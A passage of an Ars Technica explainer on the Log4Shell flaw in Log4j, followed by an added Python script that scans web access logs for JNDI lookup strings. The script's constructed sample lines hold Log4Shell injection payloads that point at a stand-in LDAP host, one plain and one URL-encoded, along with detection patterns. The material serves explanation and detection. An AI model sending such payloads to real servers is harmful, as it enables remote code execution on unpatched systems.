The Log4Shell 0-day, four days on: What is it, and how bad is it really?

by Dan Goodin, from Ars Technica

Log4Shell is the name given to a critical zero-day vulnerability that surfaced on Thursday when it was exploited in the wild in remote-code compromises against Minecraft servers. The source of the vulnerability was Log4J, a logging utility used by thousands if not millions of apps, including those used inside just about every enterprise on the planet. The Minecraft servers were the proverbial canary in the coal mine.

In the four days since, it's clear Log4Shell is every bit as grave a threat as I claimed, with the list of cloud services affected reading like a who's who of the biggest names on the Internet. Threat analysts and researchers are still assessing the damage so far and the outlook over the next weeks and months. Here's what you need to know for now.

What's Log4J and what makes Log4Shell such a big deal?

Log4J is an open source Java-based logging tool available from Apache. It has the ability to perform network lookups using the Java Naming and Directory Interface to obtain services from the Lightweight Directory Access Protocol. The end result: Log4j will interpret a log message as a URL, go and fetch it, and even execute any executable payload it contains with the full privileges of the main program. Exploits are triggered inside text using the ${} syntax, allowing them to be included in browser user agents or other commonly logged attributes.
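As an added example (not code from the article or from the Log4j project), the scanner below flags the `${}` lookup syntax described above when it appears in client-controlled fields of a web access log. The Combined Log Format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined Log Format: ip ident user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
LOOKUP_RE = re.compile(r'\$\{')                       # start of any ${...} lookup
JNDI_RE = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)  # a JNDI lookup specifically

def classify(value):
    """Return 'jndi', 'lookup' or None for one logged, client-controlled value."""
    # Percent-decode twice so URL-encoded and double-encoded forms are still seen.
    decoded = unquote(unquote(value))
    if JNDI_RE.search(decoded):
        return "jndi"
    if LOOKUP_RE.search(decoded):
        return "lookup"
    return None

def scan(lines):
    """Return (line_no, client_ip, field, verdict) for every suspicious field."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            # Unparseable line: still inspect the raw text rather than skip it.
            verdict = classify(line)
            if verdict:
                findings.append((n, None, "raw", verdict))
            continue
        for field in ("request", "referer", "agent"):
            verdict = classify(m.group(field))
            if verdict:
                findings.append((n, m.group("ip"), field, verdict))
    return findings

# Constructed sample log lines (documentation IP ranges, .invalid host name).
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.23 - - [13/Dec/2021:10:01:05 +0000] "GET /login HTTP/1.1" 200 734 "-" "${jndi:ldap://host.invalid/a}"',
    '198.51.100.23 - - [13/Dec/2021:10:01:09 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2Fhost.invalid%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '192.0.2.44 - - [13/Dec/2021:10:02:11 +0000] "GET / HTTP/1.1" 200 512 "${date:yyyy}" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line_no, ip, field, verdict in scan(SAMPLE_LOG):
        print(f"line {line_no}: {verdict} expression in {field} from {ip}")
```

A hit shows that such a string was received and logged, not that the application behind the log was vulnerable or compromised. Plain pattern matching like this does not cover every way the string can be written, so treat it as triage rather than proof of absence.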
